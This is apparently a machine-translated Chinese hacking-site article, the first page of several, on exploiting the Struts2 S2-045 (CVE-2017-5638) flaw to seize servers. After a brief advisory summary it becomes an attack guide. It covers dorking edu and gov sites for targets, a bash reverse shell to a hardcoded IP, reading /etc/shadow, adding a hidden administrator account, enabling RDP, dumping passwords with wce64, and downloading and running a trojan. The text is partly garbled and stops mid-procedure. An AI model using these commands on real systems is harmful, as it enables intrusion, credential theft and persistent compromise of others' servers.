How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net

2017-03-08T00:00:00
ID MYHACK58:62201784086
Type myhack58
Reporter 佚名
Modified 2017-03-08T00:00:00

Description

1.1 CVE-2017-5638 vulnerability profile Apache Struts 2 is the world's most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10 Vulnerability ID: CVE-2017-5638 Vulnerability rating: HIGH Vulnerability name: S2-045: Struts 2 remote code execution vulnerability Vulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE Affected version: Struts 2.3.5-Struts 2.3.31 The Struts 2.5-Struts 2.5.10 Repair solutions: Upgrade to Struts2. 3. 32 or the Struts 2.5.10.1 Struts2. 3. 32 download address: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 Struts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 The vulnerability principle: Struts2 default parse the uploaded file's Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code. 1.2 hazard assessment After the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night. 1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work 1. Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download. 2. Ready to have a separate IP of the server, 在上面有nc.exe the. 3. Prepare python environment. General use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to theoperating systemversion of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the 然后 到 该 目录 执行 pythonsetup.py install, to install. Note that in python if you do not set system variables, you'll need to strip the full path to execute. For example: C:\Python27\python.exeC:\Python27\poster-0.8.1\setup.py install ! Figure 1 The Missing poster. the encode module 4. Get a variety of action page (1)by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like. (2)Baidu aunt law inurl:index. actionsite:edu. cn inurl:index. actionsite:gov. cn inurl:index. actionsite:com. cn Note: don't vandalize, and now the network security method very good it!!! 1.3.2 modify the poc exploit code 1. For the linux version of the modified whoami values: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1 Description of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the 然后 将 文件 保存 为 poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name. ! Figure 2 modify the linux poc exploit code 2. Corresponding Windows Server, modify the whomai value: net user antian365$ Wsantian365!/ add net localgroup administratorsantian365$ /add 分别 将 poc 文件 保存 为 pocwin1.py and pocwin2.py as shown in Figure 3. ! Figure 3 modify the windows under the use of the code 1.3.3 under Windows fast implement penetration 1. Each other to open up 3389 (1)scanning each other whether to open the 3389, open a, respectively, to execute: pocwin1.py http://www.myhack58.com/index.action pocwin2.py http://www.myhack58.com/index.action If the other loopholes, then it will directly add a user“antian365$”, password“Wsantian365!”, the Server to open the 3389, sign up and then download wce64, directly wce64 –w to get the current login password, be sure to use administrator rights to execute. (2)directly on 3389 In the parameters were modified three times, execute the following code three times, you can open 3389. wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__CLASS != "") callsetallowtsconnections 1 wmic/namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f 3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method. 2. The Trojan executes the law (1)Download the Trojan First you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters: Germany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\windows\temp\ma.exe ma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\windows\temp directory. (2)the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation. c:\windows\temp\ma.exe 1.3. 4Linux under the rapid penetration of the ideas 1. On a standalone server to perform monitoring, required in the independent IP on the server, execute“nc –vv–l –p 4433”, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules. 2. Perform poc

[1] [2] [3] next